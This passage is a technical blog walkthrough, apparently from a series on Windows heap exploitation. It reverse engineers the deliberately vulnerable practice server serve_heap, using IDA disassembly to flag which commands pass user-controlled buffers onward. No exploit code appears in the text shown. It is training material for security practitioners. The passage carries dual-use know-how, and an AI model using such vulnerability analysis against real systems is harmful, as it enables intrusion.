THE

SPRAWL

    Heap Overflows For Humans is a series of articles by Steven Seeley that explores heap exploitation on Windows. In the second article of the series, Steven developed a practice exercise based on a modified version of the vulnserver source by Stephen Bradshaw. Just like the original program, serve_heap is a multithreaded server; however, almost all of its processing is performed on the heap, which makes it well suited to practicing heap overflow exploitation.

    In this article I will cover all of the steps involved in building an exploit for a heap overflow vulnerability in serve_heap targeting the Windows XP SP3 platform with DEP set to AlwaysOn. As with previous such guides, my goal is not only to present you with a solution, but also to share all of the challenges, failures, and reasoning involved in discovering the vulnerability and building the exploit.

    Spoiler Warning: I highly recommend that you attempt the challenge yourself first and come back to this article to compare solutions or if you get stuck.

    Reversing

    Before diving into the disassembly, let's attempt to interact with the application remotely. Serve_heap listens for connections on port 9999. Below is a sample interactive session:

    Welcome to Heap Vulnerable Server! Enter HELP for h
    
    HELP
    
    Valid Commands:
    HELP
    STATS [stat_value]
    RTIME [rtime_value]
    LTIME [ltime_value]
    SRUN [srun_value]
    TRUN [trun_value]
    GMON [gmon_value]
    GDOG [gdog_value]
    KSTET [kstet_value]
    GTER [gter_value]
    HTER [hter_value]
    LTER [lter_value]
    KSTAN [lstan_value]
    EXIT
    
    STATS AAAA
    STATS VALUE NORMAL
    
    EXIT
    GOODBYE
    

    NOTE: A default telnet session produces incorrectly aligned output.
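
    Because telnet garbles the alignment, a small scripted client is a convenient alternative for repeating the session above. The following is only a sketch: the host address, the helper names build_command and run_session, and the trailing newline appended to each command are assumptions made for illustration, not details taken from the server.

```python
import socket

HOST = "127.0.0.1"  # assumption: address of the machine running serve_heap
PORT = 9999         # default port shown in the session above


def build_command(name, value=""):
    """Build the raw bytes for one command line, e.g. b'STATS AAAA\\n'."""
    line = name if not value else name + " " + value
    # Assumption: a trailing newline, as a terminal client would send.
    return line.encode("ascii") + b"\n"


def run_session(commands, host=HOST, port=PORT, timeout=5.0):
    """Send each (name, value) pair in turn and return the replies, greeting first."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        # The server speaks first, so read the greeting before sending anything.
        replies.append(conn.recv(4096).decode("ascii", errors="replace"))
        for name, value in commands:
            conn.sendall(build_command(name, value))
            replies.append(conn.recv(4096).decode("ascii", errors="replace"))
    return replies
```

    With a server instance running, run_session([("HELP", ""), ("STATS", "AAAA"), ("EXIT", "")]) should return the same replies as the session above, one list entry per command.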

    Based on the above output, the server supports a number of commands which accept user input. A detailed reverse engineering session is required to understand the purpose of these commands and how they could be abused.

    Main

    Let's begin by looking at the main() function first. It begins with a call to HeapCreate() to create a private heap for the application and stores a handle in the global variable _hHeap:

    .text:004012C4 mov     [esp+298h+param3], 0 ; dwMaximumSize
    .text:004012CC mov     [esp+298h+param2], 0 ; dwInitialSize
    .text:004012D4 mov     [esp+298h+param1], 40000h ; flOptions
    .text:004012DB call    _HeapCreate@12  ; HeapCreate(x,x,x)
    .text:004012E0 sub     esp, 0Ch
    .text:004012E3 mov     ds:_hHeap, eax
    

    Notice that the flOptions flag was set to 0x00040000 which corresponds to HEAP_CREATE_ENABLE_EXECUTE. The flag makes all allocations on the private heap executable which may come in handy for shellcode storage (considering DEP is enabled).
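
    To double check a flOptions value like this one, the bits can be decoded mechanically. The sketch below uses the three HeapCreate option constants from the Windows SDK headers; the function name decode_heap_flags is made up for illustration.

```python
# HeapCreate flOptions bits as defined in the Windows SDK headers.
HEAP_FLAGS = {
    0x00000001: "HEAP_NO_SERIALIZE",
    0x00000004: "HEAP_GENERATE_EXCEPTIONS",
    0x00040000: "HEAP_CREATE_ENABLE_EXECUTE",
}

# Mask of every bit this table knows about.
KNOWN_MASK = 0
for _bit in HEAP_FLAGS:
    KNOWN_MASK |= _bit


def decode_heap_flags(fl_options):
    """Return the names of the set bits; unknown bits are reported in hex."""
    names = [name for bit, name in sorted(HEAP_FLAGS.items()) if fl_options & bit]
    unknown = fl_options & ~KNOWN_MASK
    if unknown:
        names.append(hex(unknown))
    return names
```

    Feeding it the value pushed at 004012D4, decode_heap_flags(0x40000), yields only HEAP_CREATE_ENABLE_EXECUTE, confirming that no other option is set.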

    The next series of instructions verifies that at most one command line parameter was specified. If that check passes, the code tests whether the optional parameter was actually provided. If it was not, the default string value 9999 is used to populate the local variable Port.

    .text:00401305 cmp     [ebp+argc], 2
    .text:00401309 jle     short loc_401336
      :
    .text:00401336 loc_401336:
    .text:00401336 cmp     [ebp+argc], 2
    .text:0040133A jnz     loc_4013CC
      :
    .text:004013CC loc_4013CC:
    .text:004013CC mov     [esp+298h+param3], 6
    .text:004013D4 mov     [esp+298h+param2], offset DefaultPort ; "9999"
    .text:004013DC lea     eax, [ebp+Port]
    .text:004013DF mov     [esp+298h+param1], eax ; Dest
    .text:004013E2 call    _strncpy
    

    Otherwise, the first command line parameter is subjected to a series of sanity checks to make sure it can be used as a valid port number. If all tests pass, the user-provided value is used to populate the local Port variable:

    .text:00401340 mov     eax, [ebp+argv]
    .text:00401343 add     eax, 4
    .text:00401346 mov     eax, [eax]      ; command line parameter
    .text:00401348 mov     [esp+298h+param1], eax ; Str
    .text:0040134B call    _atoi           ; convert to integer
    .text:00401350 test    eax, eax        ; test it's greater than zero
    .text:00401352 jle     short loc_4013A1
    ; ---------------------------------------------------------------------------
    .text:00401354 mov     eax, [ebp+argv]
    .text:00401357 add     eax, 4
    .text:0040135A mov     eax, [eax]      ; Command line parameter
    .text:0040135C mov     [esp+298h+param1], eax ; Str
    .text:0040135F call    _atoi           ; convert to integer
    .text:00401364 cmp     eax, 65535      ; test it's <= 65535
    .text:00401369 jg      short loc_4013A1
    ; ---------------------------------------------------------------------------
    .text:0040136B mov     eax, [ebp+argv]
    .text:0040136E add     eax, 4
    .text:00401371 mov     eax, [eax]      ; command line parameter
    .text:00401373 mov     [esp+298h+param1], eax ; Str
    .text:00401376 call    _strlen         ; string length
    .text:0040137B cmp     eax, 6          ; test it's <= 6 characters
    .text:0040137E ja      short loc_4013A1
    ; ---------------------------------------------------------------------------
    .text:00401380 mov     [esp+298h+param3], 6 ; Count
    .text:00401388 mov     eax, [ebp+argv]
    .text:0040138B add     eax, 4
    .text:0040138E mov     eax, [eax]      ; command line parameter
    .text:00401390 mov     [esp+298h+param2], eax ; Source
    .text:00401394 lea     eax, [ebp+Port]
    .text:00401397 mov     [esp+298h+param1], eax ; Dest
    .text:0040139A call    _strncpy        ; copy string to Port
    .text:0040139F jmp     short loc_4013E7
    

    As a result, you can request the service to run on a different port by specifying a value between 1 and 65535 on the command line.
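
    The argument handling above can be modelled in a few lines. This is a sketch rather than a decompilation: atoi is approximated with a regular expression, and since neither the branch taken for more than one argument nor the code at loc_4013A1 is shown, both are assumed to reject the input (returned here as None).

```python
import re

DEFAULT_PORT = "9999"


def atoi(text):
    """Approximate C atoi: skip whitespace, optional sign, then leading digits."""
    match = re.match(r"[ \t\n\v\f\r]*([+-]?[0-9]+)", text)
    return int(match.group(1)) if match else 0


def select_port(argv):
    """Return the string that would end up in Port, or None if rejected."""
    argc = len(argv)
    if argc > 2:
        return None            # assumption: this branch is not shown in the listing
    if argc != 2:
        return DEFAULT_PORT    # strncpy(Port, "9999", 6)
    arg = argv[1]
    if atoi(arg) <= 0:         # test eax, eax / jle
        return None            # assumption: loc_4013A1 rejects the value
    if atoi(arg) > 65535:      # cmp eax, 65535 / jg
        return None
    if len(arg) > 6:           # cmp eax, 6 / ja
        return None
    return arg[:6]             # strncpy(Port, argv[1], 6)
```

    One side effect visible in this model: because the numeric checks use atoi while the copy uses the raw string, an argument such as 80abc passes every test and is copied to Port unchanged.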

    At this point the application has sufficient information to initialize Windows Sockets, open a TCP socket, bind to the default or custom port, and set up a listener. All of this code is pretty standard, so I will skip its disassembly in the interests of saving space. However, the accept() loop requires some additional investigation:

    .text:00401683 loc_401683:             ; loop while socket is valid
    .text:00401683 cmp     [ebp+s], 0
    .text:0040168A jz      loc_401782
    ; ---------------------------------------------------------------------------
    .text:00401690 mov     [esp+298h+param1], offset aWaitingForClie ; "(+) Waiting for client connections...\n"
    .text:00401697 call    _printf
    .text:0040169C lea     eax, [ebp+addrlen]
    .text:004016A2 mov     [esp+298h+param3], eax ; addrlen
    .text:004016A6 lea     eax, [ebp+addr]
    .text:004016AC mov     [esp+298h+param2], eax ; addr
    .text:004016B0 mov     eax, [ebp+s]
    .text:004016B6 mov     [esp+298h+param1], eax ; s
    .text:004016B9 call    _accept@12      ; accept(x,x,x)
    .text:004016BE sub     esp, 0Ch
    .text:004016C1 mov     [ebp+conn_socket], eax ; store connection socket
    .text:004016C7 cmp     [ebp+conn_socket], 0FFFFFFFFh ; check the socket is valid
    .text:004016CE jnz     short loc_40170A
    

    Once accept() returns a new client connection socket, the value is verified and a new thread is created with the socket as its parameter:

    .text:00401744 mov     [esp+298h+param6], 0 ; lpThreadId
    .text:0040174C mov     [esp+298h+param5], 0 ; dwCreationFlags
    .text:00401754 mov     eax, [ebp+conn_socket]
    .text:0040175A mov     [esp+298h+param4], eax ; lpParameter
    .text:0040175E mov     [esp+298h+param3], offset _ConnectionHandler@4 ; lpStartAddress
    .text:00401766 mov     [esp+298h+param2], 0 ; dwStackSize
    .text:0040176E mov     [esp+298h+param1], 0 ; lpThreadAttributes
    .text:00401775 call    _CreateThread@24 ; CreateThread(x,x,x,x,x,x)
    

    Notice that the lpStartAddress parameter is populated with the function pointer ConnectionHandler. It is likely that all of the client session handling logic is located in this function.

    ConnectionHandler

    The ConnectionHandler function contains the core of the application logic and consists of a series of command handling segments. Looking at the block graph generated by IDA, we can see a "step-like" structure with a flat base, typical of a switch statement or an if-else chain:

    Let's analyze the function in small chunks in order to understand the purpose of each command starting with the local variable initialization:

    .text:0040199D mov     [ebp+maxlen], 4096 ; initialize maxlen variable
    .text:004019A4 mov     [esp+5A8h+param1], 4096 ; Size
    .text:004019AB call    _malloc         ; allocate 4096 bytes on the default heap
    .text:004019B0 mov     [ebp+buf1], eax ; store heap address in buf1
    .text:004019B3 mov     [esp+5A8h+param1], 1024 ; Size
    .text:004019BA call    _malloc         ; allocate 1024 bytes on the default heap
    .text:004019BF mov     [ebp+buf2], eax ; store heap address in buf2
    .text:004019C5 mov     [esp+5A8h+param3], 1000 ; Size
    .text:004019CD mov     [esp+5A8h+param2], 0 ; Val
    .text:004019D5 lea     eax, [ebp+buf3]
    .text:004019DB mov     [esp+5A8h+param1], eax ; Dst
    .text:004019DE call    _memset         ; zero out 1000 bytes in buf3
    .text:004019E3 mov     [esp+5A8h+param3], 4096 ; Size
    .text:004019EB mov     [esp+5A8h+param2], 0 ; Val
    .text:004019F3 mov     eax, [ebp+buf1]
    .text:004019F6 mov     [esp+5A8h+param1], eax ; Dst
    .text:004019F9 call    _memset         ; zero out 4096 bytes in buf1
    

    Notice the use of malloc() in the above two allocations as opposed to HeapAlloc(). Only HeapAlloc() allows specification of a private heap; as a result, both of these allocations happen on the application's default, non-executable heap.

    Following the two buffer allocations, the ConnectionHandler obtains lpThreadParameter containing the client socket and sends a standard user greeting:

    .text:004019FE mov     eax, [ebp+lpThreadParameter] ; conn_socket
    .text:00401A01 mov     [ebp+socket], eax
    .text:00401A07 mov     [esp+5A8h+param4], 0 ; flags
    .text:00401A0F mov     [esp+5A8h+param3], 51 ; len
    .text:00401A17 mov     [esp+5A8h+param2], offset buf ; "Welcome to Heap Vulnerable Server! Ente"...
    .text:00401A1F mov     eax, [ebp+socket]
    .text:00401A25 mov     [esp+5A8h+param1], eax ; s
    .text:00401A28 call    _send@16        ; send user greeting to the provided socket
    

    Next, up to 4096 bytes are received from the user and stored in the 4096 byte buffer, buf1:

    .text:00401A7E mov     [esp+5A8h+param4], 0 ; flags
    .text:00401A86 mov     eax, [ebp+maxlen]
    .text:00401A89 mov     [esp+5A8h+param3], eax ; len
    .text:00401A8D mov     eax, [ebp+buf1]
    .text:00401A90 mov     [esp+5A8h+param2], eax ; buf1
    .text:00401A94 mov     eax, [ebp+socket]
    .text:00401A9A mov     [esp+5A8h+param1], eax ; s
    .text:00401A9D call    _recv@16        ; receive 4096 bytes in buf1
    

    At this point we enter a series of if-else statements that extract a user command and execute the appropriate logic. Let's analyze all the commands in the order they are tested.

    HELP

    There are actually two handlers for the command HELP. The first one responds to HELP with a space following it. This is designed to handle a help request for a specific command. The default "Command specific help has not been implemented" message is sent for all inputs:

    .text:00401AB8 mov     [esp+5A8h+param3], 5 ; MaxCount
    .text:00401AC0 mov     [esp+5A8h+param2], offset Str2 ; "HELP " with space
    .text:00401AC8 mov     eax, [ebp+buf1]
    .text:00401ACB mov     [esp+5A8h+param1], eax ; Str1
    .text:00401ACE call    _strncmp
    .text:00401AD3 test    eax, eax
    .text:00401AD5 jnz     short loc_401B20
    ; ---------------------------------------------------------------------------
    .text:00401AD7 lea     edi, [ebp+tempstr] ; get address of tempstr
    .text:00401ADD mov     esi, offset aCommandSpecifi ; "Command specific help has not been impl"...
    .text:00401AE2 cld
    .text:00401AE3 mov     ecx, 47
    .text:00401AE8 rep movsb               ; copy message to tempstr
    .text:00401AEA mov     [esp+5A8h+param4], 0 ; flags
    .text:00401AF2 mov     [esp+5A8h+param3], 47 ; len
    .text:00401AFA lea     eax, [ebp+tmpstr]
    .text:00401B00 mov     [esp+5A8h+param2], eax ; buf
    .text:00401B04 mov     eax, [ebp+socket]
    .text:00401B0A mov     [esp+5A8h+param1], eax ; s
    .text:00401B0D call    _send@16        ; send(x,x,x,x)
    .text:00401B12 sub     esp, 10h
    .text:00401B15 mov     [ebp+var_414], eax
    .text:00401B1B jmp     loc_40258A
    

    The second handler of the HELP command displays the message we have seen in the interactive session earlier:

    .text:00401B20 loc_401B20:             ; MaxCount
    .text:00401B20 mov     [esp+5A8h+param3], 4
    .text:00401B28 mov     [esp+5A8h+param2], offset aHelp_0 ; "HELP" without space
    .text:00401B30 mov     eax, [ebp+buf1]
    .text:00401B33 mov     [esp+5A8h+param1], eax ; Str1
    .text:00401B36 call    _strncmp
    .text:00401B3B test    eax, eax
    .text:00401B3D jnz     short loc_401B95
      :
    .text:00401B3F lea     ecx, [ebp+helpbuf]
    .text:00401B45 mov     edx, offset aValidCommandsH ; "Valid Commands:\nHELP\nSTATS [stat_valu"...
    .text:00401B4A mov     eax, 251
    .text:00401B4F mov     [esp+5A8h+param3], eax ; Size
    .text:00401B53 mov     [esp+5A8h+param2], edx ; Src
    .text:00401B57 mov     [esp+5A8h+param1], ecx ; Dst
    .text:00401B5A call    _memcpy
    .text:00401B5F mov     [esp+5A8h+param4], 0 ; flags
    .text:00401B67 mov     [esp+5A8h+param3], 251 ; len
    .text:00401B6F lea     eax, [ebp+helpbuf]
    .text:00401B75 mov     [esp+5A8h+param2], eax ; buf
    .text:00401B79 mov     eax, [ebp+socket]
    .text:00401B7F mov     [esp+5A8h+param1], eax ; s
    .text:00401B82 call    _send@16        ; send(x,x,x,x)
    .text:00401B87 sub     esp, 10h
    .text:00401B8A mov     [ebp+var_414], eax
    .text:00401B90 jmp     loc_40258A
    

    Remarks: Neither of these handlers looks particularly interesting from the exploitation standpoint.
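
    The order of the two strncmp() checks matters, because the longer prefix has to be tested before the shorter one. A minimal model of the comparison chain is sketched below; the handler descriptions and function names are placeholders chosen for illustration.

```python
def strncmp_equal(buf, prefix):
    """True when strncmp(buf, prefix, len(prefix)) would return 0.

    Valid for prefixes without embedded NUL bytes, as is the case here.
    """
    return buf[:len(prefix)] == prefix


# Checked in the same order as the disassembly: "HELP " first, then "HELP".
HANDLERS = [
    (b"HELP ", "command-specific help (not implemented)"),
    (b"HELP", "general help listing"),
]


def dispatch(buf):
    """Return a description of the first handler whose prefix matches."""
    for prefix, handler in HANDLERS:
        if strncmp_equal(buf, prefix):
            return handler
    return "next command check"
```

    Since only the first four or five bytes are compared, any input that merely starts with HELP, such as HELPME, still lands in the general help handler.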

    STATS

    The STATS command allocates a 120 byte buffer on the default heap and populates it with the first 120 bytes from the user input buffer:

    .text:00401BB8 mov     [esp+5A8h+param1], 120 ; Size
    .text:00401BBF call    _malloc         ; allocate 120 bytes on the default heap
    .text:00401BC4 mov     [ebp+tempbuf], eax
    .text:00401BCA mov     [esp+5A8h+param3], 120 ; Size
    .text:00401BD2 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401BDA mov     eax, [ebp+tempbuf]
    .text:00401BE0 mov     [esp+5A8h+param1], eax ; Dst
    .text:00401BE3 call    _memset         ; zero out 120 bytes in tempbuf
    .text:00401BE8 mov     [esp+5A8h+param3], 120 ; Count
    .text:00401BF0 mov     eax, [ebp+buf1]
    .text:00401BF3 mov     [esp+5A8h+param2], eax ; Source
    .text:00401BF7 mov     eax, [ebp+tempbuf]
    .text:00401BFD mov     [esp+5A8h+param1], eax ; Dest
    .text:00401C00 call    _strncpy        ; copy 120 bytes from buf1 to tempbuf
    .text:00401C05 mov     eax, [ebp+tempbuf]
    .text:00401C0B mov     [esp+5A8h+param1], eax ; argstr
    .text:00401C0E call    _Function4      ; call Function4
    .text:00401C13 mov     [esp+5A8h+param4], 0 ; flags
    .text:00401C1B mov     [esp+5A8h+param3], 19 ; len
    .text:00401C23 mov     [esp+5A8h+param2], offset aStatsValueNorm ; "STATS VALUE NORMAL\n"
    .text:00401C2B mov     eax, [ebp+socket]
    .text:00401C31 mov     [esp+5A8h+param1], eax ; s
    .text:00401C34 call    _send@16        ; send(x,x,x,x)
    .text:00401C39 sub     esp, 10h
    .text:00401C3C mov     [ebp+var_414], eax
    .text:00401C42 jmp     loc_40258A
    

    Notice that a separate call is made to Function4 with the 120 byte tempbuf as the parameter. There are actually four similar functions in the application which are called by various commands in the ConnectionHandler: Function1, Function2, Function3, and Function4. I will defer the analysis of these functions until after we have an understanding of all the commands.

    Remarks: The command may be interesting, because it calls Function4 with a 120 byte user controlled buffer.
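
    Since almost every handler relies on strncpy(), it helps to keep its exact semantics in mind: it copies at most Count bytes, stops at the first NUL in the source, pads the remainder with zeros, and does not append a terminator when the source is Count bytes or longer. The following model of the destination contents is a sketch with the source passed as a Python bytes object.

```python
def strncpy(src, count):
    """Return the `count` bytes that C strncpy would write to the destination."""
    end = src.find(b"\x00")
    string = src if end == -1 else src[:end]   # the source string up to its NUL
    copied = string[:count]                    # at most `count` bytes are copied
    return copied + b"\x00" * (count - len(copied))  # the rest is zero padded
```

    For example, strncpy(b"STATS " + b"A" * 200, 120) returns 120 bytes with no NUL among them, so the tempbuf handed to Function4 is not guaranteed to be terminated within the allocation. Whether that matters depends on what Function4 does with it.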

    RTIME

    The RTIME command allocates a 520 byte buffer on the default heap and populates it with the first 520 bytes from the user input buffer:

    .text:00401C6A mov     [esp+5A8h+param1], 520 ; Size
    .text:00401C71 call    _malloc
    .text:00401C76 mov     [ebp+tempbuf], eax
    .text:00401C7C mov     [esp+5A8h+param3], 520 ; Size
    .text:00401C84 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401C8C mov     eax, [ebp+tempbuf]
    .text:00401C92 mov     [esp+5A8h+param1], eax ; Dst
    .text:00401C95 call    _memset
    .text:00401C9A mov     [esp+5A8h+param3], 520 ; Count
    .text:00401CA2 mov     eax, [ebp+buf1]
    .text:00401CA5 mov     [esp+5A8h+param2], eax ; Source
    .text:00401CA9 mov     eax, [ebp+tempbuf]
    .text:00401CAF mov     [esp+5A8h+param1], eax ; Dest
    .text:00401CB2 call    _strncpy
    .text:00401CB7 mov     [esp+5A8h+param4], 0 ; flags
    .text:00401CBF mov     [esp+5A8h+param3], 1Ah ; len
    .text:00401CC7 mov     [esp+5A8h+param2], offset aRtimeValueWith ; "RTIME VALUE WITHIN LIMITS\n"
    .text:00401CCF mov     eax, [ebp+socket]
    .text:00401CD5 mov     [esp+5A8h+param1], eax ; s
    .text:00401CD8 call    _send@16        ; send(x,x,x,x)
    .text:00401CDD sub     esp, 10h
    .text:00401CE0 mov     [ebp+var_414], eax
    .text:00401CE6 jmp     loc_40258A
    

    Remarks: Nothing interesting here; all of the buffers are properly allocated.

    LTIME

    The LTIME command is virtually identical to RTIME with the exception that we are dealing with a smaller 120 byte buffer:

    .text:00401D0E mov     [esp+5A8h+param1], 120 ; Size
    .text:00401D15 call    _malloc
    .text:00401D1A mov     [ebp+tempbuf], eax
    .text:00401D20 mov     [esp+5A8h+param3], 120 ; Size
    .text:00401D28 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401D30 mov     eax, [ebp+tempbuf]
    .text:00401D36 mov     [esp+5A8h+param1], eax ; Dst
    .text:00401D39 call    _memset
    .text:00401D3E mov     [esp+5A8h+param3], 120 ; Count
    .text:00401D46 mov     eax, [ebp+buf1]
    .text:00401D49 mov     [esp+5A8h+param2], eax ; Source
    .text:00401D4D mov     eax, [ebp+tempbuf]
    .text:00401D53 mov     [esp+5A8h+param1], eax ; Dest
    .text:00401D56 call    _strncpy
    .text:00401D5B mov     [esp+5A8h+param4], 0 ; flags
    .text:00401D63 mov     [esp+5A8h+param3], 19h ; len
    .text:00401D6B mov     [esp+5A8h+param2], offset aLtimeValueHigh ; "LTIME VALUE HIGH, BUT OK\n"
    .text:00401D73 mov     eax, [ebp+socket]
    .text:00401D79 mov     [esp+5A8h+param1], eax ; s
    .text:00401D7C call    _send@16        ; send(x,x,x,x)
    .text:00401D81 sub     esp, 10h
    .text:00401D84 mov     [ebp+var_414], eax
    .text:00401D8A jmp     loc_40258A
    

    Remarks: Nothing interesting here; all of the buffers are properly allocated.

    SRUN

    Just like LTIME and RTIME, the SRUN command simply allocates a 120 byte buffer on the default heap and copies user input:

    .text:00401DB2 mov     [esp+5A8h+param1], 120 ; Size
    .text:00401DB9 call    _malloc
    .text:00401DBE mov     [ebp+tempbuf], eax
    .text:00401DC4 mov     [esp+5A8h+param3], 120 ; Size
    .text:00401DCC mov     [esp+5A8h+param2], 0 ; Val
    .text:00401DD4 mov     eax, [ebp+tempbuf]
    .text:00401DDA mov     [esp+5A8h+param1], eax ; Dst
    .text:00401DDD call    _memset
    .text:00401DE2 mov     [esp+5A8h+param3], 120 ; Count
    .text:00401DEA mov     eax, [ebp+buf1]
    .text:00401DED mov     [esp+5A8h+param2], eax ; Source
    .text:00401DF1 mov     eax, [ebp+tempbuf]
    .text:00401DF7 mov     [esp+5A8h+param1], eax ; Dest
    .text:00401DFA call    _strncpy
    .text:00401DFF mov     [esp+5A8h+param4], 0 ; flags
    .text:00401E07 mov     [esp+5A8h+param3], 0Eh ; len
    .text:00401E0F mov     [esp+5A8h+param2], offset aSrunComplete ; "SRUN COMPLETE\n"
    .text:00401E17 mov     eax, [ebp+socket]
    .text:00401E1D mov     [esp+5A8h+param1], eax ; s
    .text:00401E20 call    _send@16        ; send(x,x,x,x)
    .text:00401E25 sub     esp, 10h
    .text:00401E28 mov     [ebp+var_414], eax
    .text:00401E2E jmp     loc_40258A
    

    Remarks: Nothing interesting here; all of the buffers are properly allocated.

    TRUN

    Finally things are getting a bit more interesting with the TRUN command. After initializing a 3000 byte buffer on the default heap, the offset variable is initialized to point exactly after the command string:

    .text:00401E56 mov     [esp+5A8h+param1], 3000 ; Size
    .text:00401E5D call    _malloc
    .text:00401E62 mov     [ebp+tempbuf], eax
    .text:00401E68 mov     [esp+5A8h+param3], 3000 ; Size
    .text:00401E70 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401E78 mov     eax, [ebp+tempbuf]
    .text:00401E7E mov     [esp+5A8h+param1], eax ; Dst
    .text:00401E81 call    _memset
    .text:00401E86 mov     [ebp+offset], 5 ; initialize offset
    

    Next, a loop is executed which continues until either the maximum received buffer is exceeded or a '.' character is found:

    .text:00401E90 loc_401E90:
    .text:00401E90 mov     eax, [ebp+offset]
    .text:00401E96 cmp     eax, [ebp+maxlen]  ; compare offset to maxlen
    .text:00401E99 jge     short loc_401EE0
    
    .text:00401E9B mov     eax, [ebp+buf1]
    .text:00401E9E add     eax, [ebp+offset] ; buf1 + offset
    .text:00401EA4 cmp     byte ptr [eax], '.' ; check the current character
    .text:00401EA7 jnz     short loc_401ED6
      :
    .text:00401ED6 loc_401ED6:
    .text:00401ED6 lea     eax, [ebp+offset]
    .text:00401EDC inc     dword ptr [eax] ; offset++
    .text:00401EDE jmp     short loc_401E90 ; loop
    

    In the case where the '.' character was found, the first 3000 bytes are copied from the user input buffer, buf1, to the temporary 3000 byte buffer, tempbuf. The temporary buffer is passed to the Function3 call as the first parameter.

    .text:00401EA9 mov     [esp+5A8h+param3], 3000 ; Count
    .text:00401EB1 mov     eax, [ebp+buf1]
    .text:00401EB4 mov     [esp+5A8h+param2], eax ; Source
    .text:00401EB8 mov     eax, [ebp+tempbuf]
    .text:00401EBE mov     [esp+5A8h+param1], eax ; Dest
    .text:00401EC1 call    _strncpy
    .text:00401EC6 mov     eax, [ebp+tempbuf]
    .text:00401ECC mov     [esp+5A8h+param1], eax ; buf
    .text:00401ECF call    _Function3
    .text:00401ED4 jmp     short loc_401EE0
    

    Regardless of whether the '.' was found or not, the allocated tempbuf is zeroed out and a confirmation message is sent to the user:

    .text:00401EE0 loc_401EE0:             ; Size
    .text:00401EE0 mov     [esp+5A8h+param3], 3000
    .text:00401EE8 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401EF0 mov     eax, [ebp+tempbuf]
    .text:00401EF6 mov     [esp+5A8h+param1], eax ; Dst
    .text:00401EF9 call    _memset
    .text:00401EFE mov     [esp+5A8h+param4], 0 ; flags
    .text:00401F06 mov     [esp+5A8h+param3], 0Eh ; len
    .text:00401F0E mov     [esp+5A8h+param2], offset aTrunComplete ; "TRUN COMPLETE\n"
    .text:00401F16 mov     eax, [ebp+socket]
    .text:00401F1C mov     [esp+5A8h+param1], eax ; s
    .text:00401F1F call    _send@16        ; send(x,x,x,x)
    .text:00401F24 sub     esp, 10h
    .text:00401F27 mov     [ebp+var_414], eax
    .text:00401F2D jmp     loc_40258A
    

    Remarks: The command is interesting because a 3000 byte user controlled buffer can be submitted to Function3.
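
    Put together, the TRUN handler behaves roughly like the model below. It is a sketch under two assumptions: buf1 is treated as zero-filled beyond the received data, and the function simply returns the bytes that would be handed to Function3 (or None when Function3 is never called). The names trun_handler and strncpy are local helpers, not symbols from the binary.

```python
MAXLEN = 4096      # size of buf1 and value of maxlen
TRUN_SIZE = 3000   # size of the temporary buffer


def strncpy(src, count):
    """Bytes that C strncpy would write: stop at NUL, zero pad to `count`."""
    end = src.find(b"\x00")
    string = src if end == -1 else src[:end]
    copied = string[:count]
    return copied + b"\x00" * (count - len(copied))


def trun_handler(received):
    """Return the tempbuf contents passed to Function3, or None if not called."""
    # Assumption: buf1 holds only zeros after the received data.
    buf1 = received[:MAXLEN].ljust(MAXLEN, b"\x00")
    offset = 5                         # skip the "TRUN " header
    while offset < MAXLEN:             # cmp eax, [ebp+maxlen] / jge
        if buf1[offset:offset + 1] == b".":
            return strncpy(buf1, TRUN_SIZE)
        offset += 1
    return None
```

    In this model trun_handler(b"TRUN AAAA") returns None, while any input with a '.' at offset 5 or later, such as b"TRUN .AAAA", produces a 3000 byte buffer for Function3.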

    GMON

    The GMON command populates a tempstr array with the message GMON_STARTED\n and passes the entire user input to the Function3 call.

    .text:00401F51 mov     eax, ds:dword_404422 ; "GMON"
    .text:00401F56 mov     [ebp+tempstr], eax
    .text:00401F5C mov     eax, ds:dword_404426 ; "_STA"
    .text:00401F61 mov     [ebp+tempstr+4], eax
    .text:00401F67 mov     eax, ds:dword_40442A ; "RTED"
    .text:00401F6C mov     [ebp+tempstr+8], eax
    .text:00401F72 movzx   eax, ds:byte_40442E ; '\n'
    .text:00401F79 mov     byte ptr [ebp+tempstr+0Ch], al
    .text:00401F7F mov     eax, [ebp+buf1]
    .text:00401F82 mov     [esp+5A8h+param1], eax ; buf
    .text:00401F85 call    _Function3
    .text:00401F8A mov     [esp+5A8h+param4], 0 ; flags
    .text:00401F92 mov     [esp+5A8h+param3], 0Dh ; len
    .text:00401F9A lea     eax, [ebp+tempstr]
    .text:00401FA0 mov     [esp+5A8h+param2], eax ; buf
    .text:00401FA4 mov     eax, [ebp+socket]
    .text:00401FAA mov     [esp+5A8h+param1], eax ; s
    .text:00401FAD call    _send@16        ; send(x,x,x,x)
    .text:00401FB2 sub     esp, 10h
    .text:00401FB5 mov     [ebp+var_414], eax
    .text:00401FBB jmp     loc_40258A
    

    Remarks: The command is interesting because the entire 4096 byte user-submitted buffer is used as a parameter to the Function3 call.

    GDOG

    The GDOG command follows the pattern established in several other commands, where a fixed size buffer on the default heap is populated with a portion of user input. Here the destination is buf2, the 1024 byte buffer allocated at the start of ConnectionHandler. Unfortunately, nothing interesting is done with that data:

    .text:00401FDF mov     [esp+5A8h+param3], 1024 ; Count
    .text:00401FE7 mov     eax, [ebp+buf1]
    .text:00401FEA mov     [esp+5A8h+param2], eax ; Source
    .text:00401FEE mov     eax, [ebp+buf2]
    .text:00401FF4 mov     [esp+5A8h+param1], eax ; Dest
    .text:00401FF7 call    _strncpy
    .text:00401FFC mov     [esp+5A8h+param4], 0 ; flags
    .text:00402004 mov     [esp+5A8h+param3], 0Dh ; len
    .text:0040200C mov     [esp+5A8h+param2], offset aGdogRunning ; "GDOG RUNNING\n"
    .text:00402014 mov     eax, [ebp+socket]
    .text:0040201A mov     [esp+5A8h+param1], eax ; s
    .text:0040201D call    _send@16        ; send(x,x,x,x)
    .text:00402022 sub     esp, 10h
    .text:00402025 mov     [ebp+var_414], eax
    .text:0040202B jmp     loc_40258A
    

    Remarks: Nothing interesting here; all of the buffers are properly allocated.

    KSTET

    The KSTET command allocates a 100 byte buffer on the default heap and populates it with the received user input. The tempbuf is used as a parameter to the Function2 call.

    .text:00402053 mov     [esp+5A8h+param1], 100 ; Size
    .text:0040205A call    _malloc
    .text:0040205F mov     [ebp+tempbuf], eax
    .text:00402065 mov     [esp+5A8h+param3], 100 ; Count
    .text:0040206D mov     eax, [ebp+buf1]
